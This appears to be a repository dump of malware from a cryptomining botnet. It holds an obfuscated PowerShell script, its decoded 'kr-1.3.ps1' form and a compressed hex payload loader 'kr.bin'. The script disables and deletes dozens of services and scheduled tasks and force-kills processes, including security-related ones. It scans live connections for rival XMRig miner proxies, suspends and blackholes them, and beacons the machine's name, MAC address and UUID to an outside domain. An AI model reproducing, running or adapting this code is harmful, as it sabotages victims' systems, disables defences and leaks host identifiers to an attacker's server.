JRtwriter.WriteLine(JRtsend_str) '+' '+' JRtwriter.flush() JRtret = JRtreader.ReadLine() JRtsocket'+'.close() }catch{} return JRtret } function raw_c'+'onnect(JRtip,JRtport,JRtsend_str){ try{ '+' J'+'Rtclient = NEW-objEcT Net.Sockets.TcpClient(JRtip,JRtport) JRtsock = JRtclient.Client JRtbytes = [Text.Encodin'+'g]::ASCII.Ge'+'tBytes(JRtsend_str) '+' JRtsock.sen'+'d((JRtbytes)'+') eS1 out-null JRtsock.ReceiveTimeout = 50'+'00 '+' '+' JRtres = [Array]::CreateInstance(('+'iD'+'fbyteiDf), 10000) JRtrecv = JRtsock.Receive(JRtres) JRtres = JRtres[0..(JRtrecv-1)] JRtst'+'r = [Text.Encoding]::'+'ASCII.g'+'etstring(J'+'Rtres) return '+'JRtstr }catch{} return uWy'+'uWy } function ishttp(JRtip,JRtport){ '+' JRtdata=uWyGET / HTTP/1'+'.19mRn9mRnuWy'+' JRtret = raw_connect JRtip JRtport'+' JRtdata if(JRtret.inde'+'xOf(uWyHTTP/1uWy) -ne -1){ '+' return JRt'+'true } return JRtfalse } func'+'tion ishttps(JRtip,JRtport){ JRtdata = uWyGET / HTTP/1.19mR'+'n9mRnuWy JRtret'+' = ssl_connect JRtip JRtport JRtdata '+' if(JRtret.indexOf(uWyHTTP/1uWy'+') -ne -1){ return JRttrue '+'} return JRtfal'+'se } function isminerproxy(JRtip,JRtport){ JRtdata =iDf{uWyiduWy:1,uWyjsonrpcuWy:uWy2.0uWy,uWymethoduWy:uWyloginuWy,uWyparamsuWy:{uWyloginu'+'Wy:uWyxuWy,uWypassuWy:null,uWya'+'gentuWy:uWyXMRig/5.13.1uWy,uWyalg'+'ouWy:[uWycn/1uWy'+',uWycn/2uWy,uWycn/ruWy,uWycn/fastuWy,'+'uWycn/halfuWy,uWycn/xaouWy,uWycn/rtouWy,uWycn/rwzuWy,uWycn/zlsuWy,uWycn/doubleuWy,u'+'Wyrx/0uWy,uWyrx/wowuWy,uWyrx/lokiuWy,uWyrx/arquWy,uWyrx/sfxuWy,uWyrx/kevauWy]}}iDf '+'+ uWy9mRnuW'+'y JRtret = r'+'aw_connect JRtip '+'JRtport JR'+'tdata'+' if(JRtret.indexOf(uWyjsonrpcu'+'Wy) -ne -'+'1){ '+' write-host uWyminer proxy!!uWy return '+'JRtt'+'rue } retu'+'rn JRtfalse } function isminerp'+'roxys(JRtip,JRtport){ JRtdata = iDf'+'{uWyiduWy:1,uWyjsonrpcuWy'+':uWy2.0uWy,uWymethoduWy:uWyloginuWy,uWyparamsuWy:{'+'uWylogin'+'uWy:uWyxuWy,uWypassuWy:'+'null,uWyagentuWy'+':uWyXMRig/5.13'+'.1uWy,uWyalgouWy:[uWycn/1uWy,'+'uWycn/2uWy,uWycn/ruWy,uWycn/fastuWy,uWyc'+'n/halfuWy,uWycn/xaouWy,uWycn/rtouWy,uWycn/rwz'+'uWy'+',uWycn/zlsuWy,uWycn/doubleuWy,uWyrx/0uWy,uWyrx/'+'wowuWy,uWyrx/lokiuWy,uWyrx/arquWy,uWyrx/sf'+'xuWy,uWyrx/kevauWy]}}iDf JRtret = ssl_connect JRtip JRtp'+'ort J'+'Rtdata if(JRtret.indexOf(uWyjsonrpcuWy) -ne -1){ writ'+'e-host uWymin'+'er proxys!!uWy '+' re'+'turn JRtt'+'rue } return JRtfalse } Ad'+'d-Type -TypeDefinition iDfusing System;using System.Diagnostics;using System'+'.Security.Principal;using System.Runtime.InteropServices;pu'+'blic static class Kernel32{[DllImport(uWykernel32.dlluWy)] public static extern bool'+' CheckRemoteDebuggerPresent(IntPtr hProce'+'ss,'+'out bool pbDebuggerPresent);[DllImport(uWykernel32.dl'+'luWy)] public static extern int DebugAct'+'iveProcess(int PID);[DllImport(uWykerne'+'l32.dlluWy)] public static exter'+'n int DebugActiveProcessStop(int PID);}iDf function ProcessSuspend(JRtid){ J'+'RtprocName = (Get-Process -id JRtid -Er'+'rorAction SilentlyContinue).name if(JRtprocName -eq JRtnull){ Write-Hos'+'t u'+'WyERROR: There i'+'s no process with an ID of JRtiduWy return } '+' Write-host u'+'WyAttempting to suspend JRtprocName (PID: JRtid)...uWy if (JRtid -le 0) { write-host uWyYou didniDft '+'input a positive integeruWy return } JRtd'+'ebug = whoami /priv eS1 Where-Object{JRt_ -like uWy*SeDebugPrivilege*uWy}'+' if(JRtdebug -ne JRtnull){ '+' JRtDebugPresent = [IntPtr'+']::Zero JRtout'+' = [Kernel'+'32]::CheckRe'+'moteDebuggerPresent(((Get-Process -Id'+' JRti'+'d).Handle),[ref]JRtdebugPresent) if (JRtdebugPresent){ wr'+'ite-host uWyThere is already a debugger attached to this processuWy '+' retur'+'n } '+' '+' JRtsuspend = [Kernel32]::Debug'+'Ac'+'tiveProcess(JRtid) if'+' (JRtsuspend -eq JRtfalse){ write-host uWyERROR: Unable to'+' suspend JRtprocName (PID: JRtid)uWy } else{ write-host u'+'WyThe JRtprocName process (PID: JRtid) was successfully'+' suspended!uWy } } else{ write-host uWyERROR: You do not have debu'+'gging pri'+'vileges to pau'+'se a'+'ny p'+'rocessuWy'+' return } } function gmd5(JRtd){ [Secu'+'ri'+'ty.Cryptograph'+'y.MD5]::Create().Compute'+'Hash('+'JRtd)eS1foreach{JRtl+'+'=JRt_.ToString(iDfx2'+'iDf)} return JRtl } function getprotected(){ function getrname(){ function gmd5(JRtd){ [Security.Cryptography.MD5]::Create().C'+'omput'+'eHash(JRtd)eS1fore'+'ach{JRtl+=JRt_.ToString(iDfx2iDf)} return JRtl } JRtrpath=uWyC:TaDWindowsTaDSy'+'stem32TaDWindowspowershellTaDV1.0uWy '+' JRtenames = gci uWyJR'+'trpathTaD*uWy -Include *.exe'+' -Exclude po'+'wershell.exeeS1f'+'oreach{JRt_.name}'+' JRtt'+'md5 = gmd5 ([IO.File]::R'+'eadAllBytes(uWyJRtrpathTaDpowershell.exeuWy)) foreach(JRtename in JRtenames){ '+' JRtmd5_=gmd'+'5 ([IO.File]::Read'+'AllBytes(uWyJRtrpathTaDJRtenameu'+'W'+'y)) if(JRttmd5 -eq '+'JRtmd5_){ '+' '+' return JRtename '+' } '+' } retur'+'n uWyNULLNULLuWy } JRtcomp_name = JRtenv:COMPUTERNAME JRtguid = (get-wmiobject W'+'in32_ComputerSystemProduct).UUID JRtmac = (Get-WmiObject Win32_NetworkAdapter'+'Configuration eS1 where {'+'JRt_.ipenabled -EQ JRttrue}).Macaddress eS1 select-object '+'-first 1 JRtm6exe=('+'gmd5 ([system.Text.E'+'ncoding]::UTF8.GetBytes(JRtcomp_name+J'+'Rtguid+JRtm'+'ac))).substring(0,6) JRtpi'+'ds=@'+'() JRtpids+=Get-WmiObject -Class Win32_ProcesseS1Where-Object{JRt_.path -li'+'ke iD'+'f*m6g.bin.exe*iDf -or JRt_.path -like iDf*m6.bin.ex'+'e*iDf -'+'or'+' JRt_.path -like uWy*JRtm'+'6exe*uWy -or JRt_.name -eq (getrname)}eS1foreach{JRt_.processid} return JRtpids } function sen'+'dmsg(JRtip,JRtismproxy,JRtmpid){ try{ JRtm'+'ac = (Ge'+'t-WmiObject Win32_Network'+'AdapterConfiguration eS1 where {JRt_.ipenabled -EQ JRttru'+'e}).Macaddress eS1 select-objec'+'t'+' -first 1 '+' JRtguid = (get-wmiobjec'+'t Win32_Comp'+'uterSystemProduct).UUID JRtcomp_na'+'me = JRtenv:COMPUTERNAME if(JRtip -eq iD'+'fiDf){ '+' JRturl = uWyJR'+'tdown_url/kl_repo.json?JRtversion&JRtglobal:retry&JRtcomp_name&JRtmac&JRtguiduWy } else { JRt'+'pname = Get-Process -id J'+'Rtmpid eS1 Select-Objec'+'t -ExpandProperty Name '+' JRturl = uWyJRtdown_url/'+'rellik.json?JRtvers'+'ion&JRtglobal:retry&J'+'Rtco'+'mp_nam'+'e&JRtmac&JRtguid&JRtip&JRtismproxy&JRtmpid&'+'JRtpnameuWy '+' } (New'+'-Object Net.WebClient).DownloadString('+'J'+'Rturl) }catch{}'+' } function'+' banIp(JRtip)'+'{ '+' route add J'+'Rtip 0.0.0.0 IF 1'+' -p } function unbanIp(JRtip){ route del'+'ete JRtip 0.0.0.0 } Function Killer { JRtSr'+'v'+'Name = uWyxWinWpdSrvuWy, uWySVSHo'+'stuWy, uWyMicrosoft TelemetryuWy, uWylsassuWy, uW'+'yMicrosof'+'tuW'+'y, uWysystemuWy, uWyOracleupdateuWy, uWyCLRu'+'Wy, uWysysmgtuWy, uWyTaDgmuWy,'+' uWyWmdnPnSNuWy, uWySougoudluWy,uW'+'yNationaluWy, uWyNationaaaluWy, u'+'W'+'yNatimmonaluWy, uWyNationalolluWy, uWyNationalmll'+'uWy,uWyNationalaieuWy,uWyNationalwpiuWy,uWyWi'+'nHelp32uW'+'y,uWyWinHelp64uWy, '+'uWySam'+'serveruWy, uWyRpcEptMangeruWy, uW'+'yN'+'etMsmqActiv Media NVIDIAuWy, uWySncryption M'+'edia Playeq'+'uWy,uWySxSuWy,uWyWinSvcuWy,uWymssecsvc2.1uWy,uWymssecsvc2.0uWy,uWyWindows_UpdateuWy,uWyWindows ManagersuWy,uWySvcNlauseruWy,uWyWinVaultSvcuWy,uWyXtfy'+'uWy,uWyXtfyauWy,uWyXtfyxxxuWy,uWy360rTysuWy,uWyIPSECSuWy,uWyMpeSvcuWy,uWySRDSLuWy,uWyWifiServiceuWy,uWyALGMuWy,uWywmiApSrvsuWy,uWywmiApServsuWy,uW'+'ytaskmgr1uWy,'+'uWyWeb'+'ServersuWy,uWyExpressVNServiceuWy,uWyWWW.DDOS.CN.'+'COMuWy,'+'uWyWinHelpSvcsuWy,uWyaspnet_statersuWy,uWyclr_optimizationu'+'Wy,uWyAxInstSVuWy,uW'+'yZationaluWy,uWyDNS ServeruWy,uWyS'+'er'+'hiezuWy,uWySuperProServeruWy,uWy.Net CLRuW'+'y,uWyWissssssnHelp32uWy,uWyWinHasdadelp32uWy,uWyWinHasdelp32uWy,uWyClipBo'+'oksu'+'Wy write-host uW'+'yki'+'ll services...uWy '+' foreach(JRtSrv in JRtSrvName) {'+' JRtNull = SC.exe '+'Config JRtSrv Star'+'t= Disabled JRtNull = SC.exe Stop JRtSrv JRtNull = SC.exe D'+'elete JRtSrv } JRtTaskName = uWym'+'y1uWy,uWyMysauWy, uWyMysa1uWy, uWyMysa2uWy, uWyMysa3uWy, '+'uWyokuWy, uWyOracle JavauWy, uWyOracle Java U'+'pdateuWy, uWyMicrosoft TelemetryuWy, uWySpooler SubSyst'+'em ServiceuWy,uWyOracle Pr'+'oducts ReporteruWy, uWyUpdate'+' service for productsuWy, uWygmuWy'+', uWyngmuWy,uWySorryuWy,uWyWindows_UpdateuWy,uWyUpdate_windowsuWy,'+'uWyWindowsUpdate1uWy,uW'+'yWindowsUpdat'+'e2uWy,uWyWindowsUpdate3uWy,uWyAdobeFlashPlayeruWy,'+'uWyFlashPlayer1uWy,uWyF'+'lashPlayer2uWy,uWyFlashPlayer3uWy,uWyIISuWy,uWyWindowsLogTasksuWy,uWySystem Log S'+'ecurity CheckuWy,uWyUpdateuWy,uWyUpdate1uWy,uWyUpdate2uWy,uWyUp'+'date3uWy,uWyUpdate4uWy,uWyDNSu'+'Wy,uWySYSTEMuWy,uWyDNS2uWy,uWySYSTEMauWy,uW'+'yskycmduWy,uWyMiscfostuWy,uWyNetframeworkuWy,uW'+'yFlashuWy,'+'uWyRavTaskuWy,uWyGoo'+'glePing'+'ConfigsuWy,uWyHomeGroupProvideruWy,uWyMiscfostNsiu'+'Wy,uWyWwANsvcuWy,uWyBluetoothsuWy,uWyDdrive'+'rsuWy'+',uWyDnsScanuWy,uWyWebServersuWy,uWyCredentialsuWy,uWyTablteInputoutuWy,uWywerclpsyportuWy,uWyHispDemornuWy,uWyLimeRAT-AdminuWy,uWyDnsCoreuWy'+',uW'+'yUpdate ser'+'vice for Windows ServiceuWy,uWyDnsCoreuWy,uWyECDnsCoreuWy writ'+'e-host uWykill tasks...uWy f'+'oreach (JRtTask in'+' JRtTaskName'+') { SchTasks.exe /Dele'+'te /TN JRtTask /F 2> J'+'RtNull } JRt'+'Miner = uWySCuWy,uWyWerMgruWy,uWyWerFaultuWy,uWyDW20uW'+'y,uWymsinfouWy, uWyXM'+'R*uWy,uWyxmrig*uWy, uWyminerduWy, uWyMinerGateuWy, uWyCarbonuWy, u'+'Wyyamm1uWy, uWyupgeadeu'+'Wy, uWyauto-'+'upgeadeuWy, '+'uWysvs'+'hostuWy, uWySyst'+'emIISuWy, uWySystemIISSe'+'cuWy, iDfWindowsUpdater*iDf, uWyWindowsDefender*uWy, uWyupdateuWy, uWycarssuWy,'+' uWyserviceuWy, uWycsrscuWy, uWycarauWy, uWyjavaupduWy, uWygxdrvuWy, uWylsmoseeuWy, uWysecuamsuWy, uWySQ'+'LEXPRESS_X64_86uWy, uWy'+'CalligrapuWy, '+'uWySqlceqpuWy, uWySettin'+'guWy, uWyUninstauWy, uWyconhosteuWy,'+'uWySetringuWy,uWyGalli'+'grpuWy,uWyImaginguWy,uWytaskegruWy,uWyTerms.EXEuWy,u'+'Wy360uWy,uWy88'+'66uWy,uWy99'+'66uWy,uWy9696uWy,uWy9797uWy,uWysvchostiuWy,uWySearchI'+'ndexuWy,uWyAvirauWy,uWycoherneceuWy,uWywinuWy,uWySQLforwinuWy,uWy'+'xig*uWy,uWytaskmgr1uWy,uWyWorkstationuWy,uWyressuWy,'+'uWyexploresuWy write-host uWy'+'kill processes...uWy foreach (JR'+'tm '+'in JRtMiner) { Get-Pr'+'ocess -'+'Name JRtm -ErrorAction SilentlyContinue eS1 Stop-Process -Force '+'} JRttm = Get-Process -Name TaskMgr -ErrorAc'+'tio'+'n SilentlyContinue if(JRttm -eq JRtnull){ Start-Process -WindowS'+'tyle hidden -F'+'ilePath Ta'+'skmgr.exe '+' } JRttcpconn = NetSta'+'t -anop TCP JRtipcache=@(iDf170.187.149.77:80i'+'Df,i'+'Df138'+'.68.186.90:80iDf,iDf176.58.99.231:80iDf,i'+'Df'+'138.68.251.24:80iDf,iDf165.227.62.120:443iDf,iDf202.182.120.192:443iDf,iDf178.62.2.194:443iDf,iDf138.68.4.19:443iDf,iDf176.58.99.231:443iDf,iDf'+'138.68.'+'251.24:443iDf,iDf85.117.234.189:443iDf,iDf159.203.122.42iDf) '+' for'+'each(JRttempip in JRtipcache){ unbanIp JRttemp'+'ip } '+' JRtppids = getprotected write-host uWykill connections...uWy foreach (JRtt in JRttcpconn) { JRtline = JRtt.split(iDf iDf)eS1 ? {JRt'+'_} if (JRtline -eq JRtnull) { conti'+'nue } if (JRtt.contains(uWyLISTENINGuWy) '+'-and (JRtline[1].co'+'ntains(uWy4'+'3669uWy'+') -or JRtline[1].contains(uWy43668uWy))) { JRtppids += JRtline[-1] '+' '+'continue } '+' if(JRtt.contains(uWyESTA'+'BLISHEDuWy)'+' -and (JRtline[2].gettype() '+'-eq uWyuWy.gettype()) -and (JRtline'+'[2].indexOf(uWy:uWy) -ne -1)){ '+' JRtip,JRtport = JRtline[2].sp'+'lit(iDf:iDf'+') JRtcurrpid = JRtline[-1] i'+'f((JRtipcache -conta'+'ins '+'JRtline[2]) -or (JRtppids -c'+'ontains JRtcurrpid) -or (JRtip.length -lt 4) -or'+' -not(isP'+'ubIP JRtip) -or'+' (JRtp'+'ort -le 0)){ '+' continue } if(JRtglobal:ipdealcache'+' -contains JRtline[2]){ ProcessSus'+'pend JRtcurrpid '+' banIp JRtip '+' continue '+' } writ'+'e'+'-host uWytry'+' JRtip'+' JRtport...uWy if(((ishttp JRtip JRtport) -eq JRtfalse) -and ((ishttps JRtip JRtport) -eq JRtfalse)){'+' write-host '+'uWyend http t'+'est...uWy JRti'+'smproxy = 0 if((i'+'sminerproxy JRtip'+' JRtport) -eq JRttrue){ '+' J'+'Rtismproxy = 1 '+'} else{ if((isminerproxys JRtip JRtport) -eq '+'JRttrue){ JRtismproxy = 2 }'+' '+' } if(JRtismproxy -ne 0){ ProcessSuspend JRtcurrpid ban'+'Ip JRtip '+' JRtglobal:ipdealcache += JRtline[2] sendmsg JRtline[2] JRtismproxy JRtcurrpid } } if(JRtipcache -notcontains JRtline['+'2]){JRti'+'pcache += JRtline[2]} } } JRtglobal:re'+'try++ } JRtstart_time=Get-Date -UFormat uWy%suWy JRtglobal:ipdealcache=@() JRtglobal:retry=0 JRtser=[System.Net.Soc'+'ke'+'ts.TcpListener]65529 JRtser.start()'+' while('+'JRttrue){ if(((Get-Date -UFormat uWy%suWy)-JRtstart_time) -gt 60000) {break} uWytry to kill...uWy K'+'iller uWykill '+'done...uWy Start-Sleep -S'+'econds 600 } ').rePlAcE(([chAR]74+[chAR]82+[chAR]116),[STrinG][chAR]36).rePlAcE(([chAR]105+[chAR]68+[chAR]102),[STrinG][chAR]39).rePlAcE('TaD',[STrinG][chAR]92).rePlAcE('eS1','|').rePlAcE('uWy',[STrinG][chAR]34).rePlAcE('9mR','')) -------------------------------------------------------------------------------- /DriveLife/krBin/kr-1.3.ps1: -------------------------------------------------------------------------------- 1 | if(!$down_url){ $down_url = 'http://d.u78wjdu.com' } try{$version=$ifmd5[0..5]-join""}catch{} function isPubIP { Param( [parameter(Mandatory=$true)][String]$ip ) $resIps = @( @(4026531840L, 3758096384L), @(4026531840L, 4026531840L), @(4278190080L, 0L), @(4278190080L, 167772160L), @(4278190080L, 2130706432L), @(4290772992L, 1681915904L), @(4293918720L, 2886729728L), @(4294836224L, 3323068416L), @(4294901760L, 2851995648L), @(4294901760L, 3232235520L), @(4294967040L, 3221225472L), @(4294967040L, 3221225984L), @(4294967040L, 3227017984L), @(4294967040L, 3325256704L), @(4294967040L, 3405803776L), @(4294967295L, 4294967295L) ) $iparr = $ip.split(".") $iplong = 0 for($i=3;$i -ge 0; $i--){ $iplong = $iplong -bor [int]$iparr[3-$i] * [math]::pow(2,8*$i) } for($j=0;$j -lt $resIps.count;$j++){ if(($iplong -band $resIps[$j][0]) -eq $resIps[$j][1]){ return $false } } return $true } function ssl_connect($ip,$port,$send_str){ $ret = "" try{ $socket = New-Object Net.Sockets.TcpClient($ip, $port) $sslStream = New-Object System.Net.Security.SslStream($socket.GetStream(),$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback])) $sslStream.ReadTimeout = 5000 $sslStream.AuthenticateAsClient('') $writer = new-object System.IO.StreamWriter($sslStream) $reader = new-object System.IO.StreamReader($sslStream) $writer.WriteLine($send_str) $writer.flush() $ret = $reader.ReadLine() $socket.close() }catch{} return $ret } function raw_connect($ip,$port,$send_str){ try{ $client = NEW-objEcT Net.Sockets.TcpClient($ip,$port) $sock = $client.Client $bytes = [Text.Encoding]::ASCII.GetBytes($send_str) $sock.send(($bytes)) | out-null $sock.ReceiveTimeout = 5000 $res = [Array]::CreateInstance(('byte'), 10000) $recv = $sock.Receive($res) $res = $res[0..($recv-1)] $str = [Text.Encoding]::ASCII.getstring($res) return $str }catch{} return "" } function ishttp($ip,$port){ $data="GET / HTTP/1.1nn" $ret = raw_connect $ip $port $data if($ret.indexOf("HTTP/1") -ne -1){ return $true } return $false } function ishttps($ip,$port){ $data = "GET / HTTP/1.1nn" $ret = ssl_connect $ip $port $data if($ret.indexOf("HTTP/1") -ne -1){ return $true } return $false } function isminerproxy($ip,$port){ $data ='{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":null,"agent":"XMRig/5.13.1","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva"]}}' + "n" $ret = raw_connect $ip $port $data if($ret.indexOf("jsonrpc") -ne -1){ write-host "miner proxy!!" return $true } return $false } function isminerproxys($ip,$port){ $data = '{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":null,"agent":"XMRig/5.13.1","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva"]}}' $ret = ssl_connect $ip $port $data if($ret.indexOf("jsonrpc") -ne -1){ write-host "miner proxys!!" return $true } return $false } Add-Type -TypeDefinition 'using System;using System.Diagnostics;using System.Security.Principal;using System.Runtime.InteropServices;public static class Kernel32{[DllImport("kernel32.dll")] public static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess,out bool pbDebuggerPresent);[DllImport("kernel32.dll")] public static extern int DebugActiveProcess(int PID);[DllImport("kernel32.dll")] public static extern int DebugActiveProcessStop(int PID);}' function ProcessSuspend($id){ $procName = (Get-Process -id $id -ErrorAction SilentlyContinue).name if($procName -eq $null){ Write-Host "ERROR: There is no process with an ID of $id" return } Write-host "Attempting to suspend $procName (PID: $id)..." if ($id -le 0) { write-host "You didn't input a positive integer" return } $debug = whoami /priv | Where-Object{$_ -like "*SeDebugPrivilege*"} if($debug -ne $null){ $DebugPresent = [IntPtr]::Zero $out = [Kernel32]::CheckRemoteDebuggerPresent(((Get-Process -Id $id).Handle),[ref]$debugPresent) if ($debugPresent){ write-host "There is already a debugger attached to this process" return } $suspend = [Kernel32]::DebugActiveProcess($id) if ($suspend -eq $false){ write-host "ERROR: Unable to suspend $procName (PID: $id)" } else{ write-host "The $procName process (PID: $id) was successfully suspended!" } } else{ write-host "ERROR: You do not have debugging privileges to pause any process" return } } function gmd5($d){ [Security.Cryptography.MD5]::Create().ComputeHash($d)|foreach{$l+=$_.ToString('x2')} return $l } function getprotected(){ function getrname(){ function gmd5($d){ [Security.Cryptography.MD5]::Create().ComputeHash($d)|foreach{$l+=$_.ToString('x2')} return $l } $rpath="C:\Windows\System32\Windowspowershell\V1.0" $enames = gci "$rpath\*" -Include *.exe -Exclude powershell.exe|foreach{$_.name} $tmd5 = gmd5 ([IO.File]::ReadAllBytes("$rpath\powershell.exe")) foreach($ename in $enames){ $md5_=gmd5 ([IO.File]::ReadAllBytes("$rpath\$ename")) if($tmd5 -eq $md5_){ return $ename } } return "NULLNULL" } $comp_name = $env:COMPUTERNAME $guid = (get-wmiobject Win32_ComputerSystemProduct).UUID $mac = (Get-WmiObject Win32_NetworkAdapterConfiguration | where {$_.ipenabled -EQ $true}).Macaddress | select-object -first 1 $m6exe=(gmd5 ([system.Text.Encoding]::UTF8.GetBytes($comp_name+$guid+$mac))).substring(0,6) $pids=@() $pids+=Get-WmiObject -Class Win32_Process|Where-Object{$_.path -like '*m6g.bin.exe*' -or $_.path -like '*m6.bin.exe*' -or $_.path -like "*$m6exe*" -or $_.name -eq (getrname)}|foreach{$_.processid} return $pids } function sendmsg($ip,$ismproxy,$mpid){ try{ $mac = (Get-WmiObject Win32_NetworkAdapterConfiguration | where {$_.ipenabled -EQ $true}).Macaddress | select-object -first 1 $guid = (get-wmiobject Win32_ComputerSystemProduct).UUID $comp_name = $env:COMPUTERNAME if($ip -eq ''){ $url = "$down_url/kl_repo.json?$version&$global:retry&$comp_name&$mac&$guid" } else { $pname = Get-Process -id $mpid | Select-Object -ExpandProperty Name $url = "$down_url/rellik.json?$version&$global:retry&$comp_name&$mac&$guid&$ip&$ismproxy&$mpid&$pname" } (New-Object Net.WebClient).DownloadString($url) }catch{} } function banIp($ip){ route add $ip 0.0.0.0 IF 1 -p } function unbanIp($ip){ route delete $ip 0.0.0.0 } Function Killer { $SrvName = "xWinWpdSrv", "SVSHost", "Microsoft Telemetry", "lsass", "Microsoft", "system", "Oracleupdate", "CLR", "sysmgt", "\gm", "WmdnPnSN", "Sougoudl","National", "Nationaaal", "Natimmonal", "Nationaloll", "Nationalmll","Nationalaie","Nationalwpi","WinHelp32","WinHelp64", "Samserver", "RpcEptManger", "NetMsmqActiv Media NVIDIA", "Sncryption Media Playeq","SxS","WinSvc","mssecsvc2.1","mssecsvc2.0","Windows_Update","Windows Managers","SvcNlauser","WinVaultSvc","Xtfy","Xtfya","Xtfyxxx","360rTys","IPSECS","MpeSvc","SRDSL","WifiService","ALGM","wmiApSrvs","wmiApServs","taskmgr1","WebServers","ExpressVNService","WWW.DDOS.CN.COM","WinHelpSvcs","aspnet_staters","clr_optimization","AxInstSV","Zational","DNS Server","Serhiez","SuperProServer",".Net CLR","WissssssnHelp32","WinHasdadelp32","WinHasdelp32","ClipBooks" write-host "kill services..." foreach($Srv in $SrvName) { $Null = SC.exe Config $Srv Start= Disabled $Null = SC.exe Stop $Srv $Null = SC.exe Delete $Srv } $TaskName = "my1","Mysa", "Mysa1", "Mysa2", "Mysa3", "ok", "Oracle Java", "Oracle Java Update", "Microsoft Telemetry", "Spooler SubSystem Service","Oracle Products Reporter", "Update service for products", "gm", "ngm","Sorry","Windows_Update","Update_windows","WindowsUpdate1","WindowsUpdate2","WindowsUpdate3","AdobeFlashPlayer","FlashPlayer1","FlashPlayer2","FlashPlayer3","IIS","WindowsLogTasks","System Log Security Check","Update","Update1","Update2","Update3","Update4","DNS","SYSTEM","DNS2","SYSTEMa","skycmd","Miscfost","Netframework","Flash","RavTask","GooglePingConfigs","HomeGroupProvider","MiscfostNsi","WwANsvc","Bluetooths","Ddrivers","DnsScan","WebServers","Credentials","TablteInputout","werclpsyport","HispDemorn","LimeRAT-Admin","DnsCore","Update service for Windows Service","DnsCore","ECDnsCore" write-host "kill tasks..." foreach ($Task in $TaskName) { SchTasks.exe /Delete /TN $Task /F 2> $Null } $Miner = "SC","WerMgr","WerFault","DW20","msinfo", "XMR*","xmrig*", "minerd", "MinerGate", "Carbon", "yamm1", "upgeade", "auto-upgeade", "svshost", "SystemIIS", "SystemIISSec", 'WindowsUpdater*', "WindowsDefender*", "update", "carss", "service", "csrsc", "cara", "javaupd", "gxdrv", "lsmosee", "secuams", "SQLEXPRESS_X64_86", "Calligrap", "Sqlceqp", "Setting", "Uninsta", "conhoste","Setring","Galligrp","Imaging","taskegr","Terms.EXE","360","8866","9966","9696","9797","svchosti","SearchIndex","Avira","cohernece","win","SQLforwin","xig*","taskmgr1","Workstation","ress","explores" write-host "kill processes..." foreach ($m in $Miner) { Get-Process -Name $m -ErrorAction SilentlyContinue | Stop-Process -Force } $tm = Get-Process -Name TaskMgr -ErrorAction SilentlyContinue if($tm -eq $null){ Start-Process -WindowStyle hidden -FilePath Taskmgr.exe } $tcpconn = NetStat -anop TCP $ipcache=@('170.187.149.77:80','138.68.186.90:80','176.58.99.231:80','138.68.251.24:80','165.227.62.120:443','202.182.120.192:443','178.62.2.194:443','138.68.4.19:443','176.58.99.231:443','138.68.251.24:443','85.117.234.189:443','159.203.122.42') foreach($tempip in $ipcache){ unbanIp $tempip } $ppids = getprotected write-host "kill connections..." foreach ($t in $tcpconn) { $line = $t.split(' ')| ? {$_} if ($line -eq $null) { continue } if ($t.contains("LISTENING") -and ($line[1].contains("43669") -or $line[1].contains("43668"))) { $ppids += $line[-1] continue } if($t.contains("ESTABLISHED") -and ($line[2].gettype() -eq "".gettype()) -and ($line[2].indexOf(":") -ne -1)){ $ip,$port = $line[2].split(':') $currpid = $line[-1] if(($ipcache -contains $line[2]) -or ($ppids -contains $currpid) -or ($ip.length -lt 4) -or -not(isPubIP $ip) -or ($port -le 0)){ continue } if($global:ipdealcache -contains $line[2]){ ProcessSuspend $currpid banIp $ip continue } write-host "try $ip $port..." if(((ishttp $ip $port) -eq $false) -and ((ishttps $ip $port) -eq $false)){ write-host "end http test..." $ismproxy = 0 if((isminerproxy $ip $port) -eq $true){ $ismproxy = 1 } else{ if((isminerproxys $ip $port) -eq $true){ $ismproxy = 2 } } if($ismproxy -ne 0){ ProcessSuspend $currpid banIp $ip $global:ipdealcache += $line[2] sendmsg $line[2] $ismproxy $currpid } } if($ipcache -notcontains $line[2]){$ipcache += $line[2]} } } $global:retry++ } $start_time=Get-Date -UFormat "%s" $global:ipdealcache=@() $global:retry=0 $ser=[System.Net.Sockets.TcpListener]65529 $ser.start() while($true){ if(((Get-Date -UFormat "%s")-$start_time) -gt 60000) {break} "try to kill..." Killer "kill done..." Start-Sleep -Seconds 600 } 2 | -------------------------------------------------------------------------------- /DriveLife/krBin/kr.bin: -------------------------------------------------------------------------------- 1 | $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('edbd07601c499625262f6dca7b7f4af54ad7e074a10880601324d8904010ecc188cde692ec1d69472329ab2a81ca6556655d661640cced9dbcf7de7befbdf7de7befbdf7ba3b9d4e27f7dfff3f5c6664016cf6ce4adac99e2180aac81f3f7e7c1f3f22d2efbd7e539f2d3ffffea3473f5d15cbadf4e38f475be9f75ee59fe7bf377db6386e4fe6a7afb73e7a5115af5f9fd62f7fef7cfbf4f7aa7ef24591fe4c7ae7e33fe0e3d19d4f7776bfff2a9b4fbff7c9ce03fde5fe7df9656beb747a5cae4eebf19dfd3d6df5fd8b1767afdae67ba38fbff3f2d38f5d838f7f37827560201c7caabf7caa9f78a01edeeb40bab36b807f72cf00d839e8bdf7f16f9cfcc6c99d3bd7672f7ffad903fa7744ff7fb57848ff729b9739d024d8c780fdf9b2a8dfbcfe1eda5c7f771db4a13f087505b0fb3a0fbedc7bd807f0347bf3f1271f07cd1e76fbb9b30732e2231e3bff729fdec2a7f4e3d80e855fffb4f7faa7bbe6f5bd03fd65ff81fce2bd47388008bf71f24bf0cfcecea769335b56530ce113faffebed7495e7e5ebedb6cedad73f863634f8f1789c2fab197d4f88a0595a96f45bf196be4be9f98d13faeb374eeabc2c0b05f47b79efd2a76fd3aa4dafebd6be4008bccdf27af28bd33b3b3b40a3bdd84eefe48ba2fdfdd175d3befacef61d6addfcee78a5cd1675f5ecabed346fb3a7db6dfef9d616f5b8755e1860bff84ebeaee9a396de530cb6f2b2985f3116f2c19d2d863cae7340c7170ff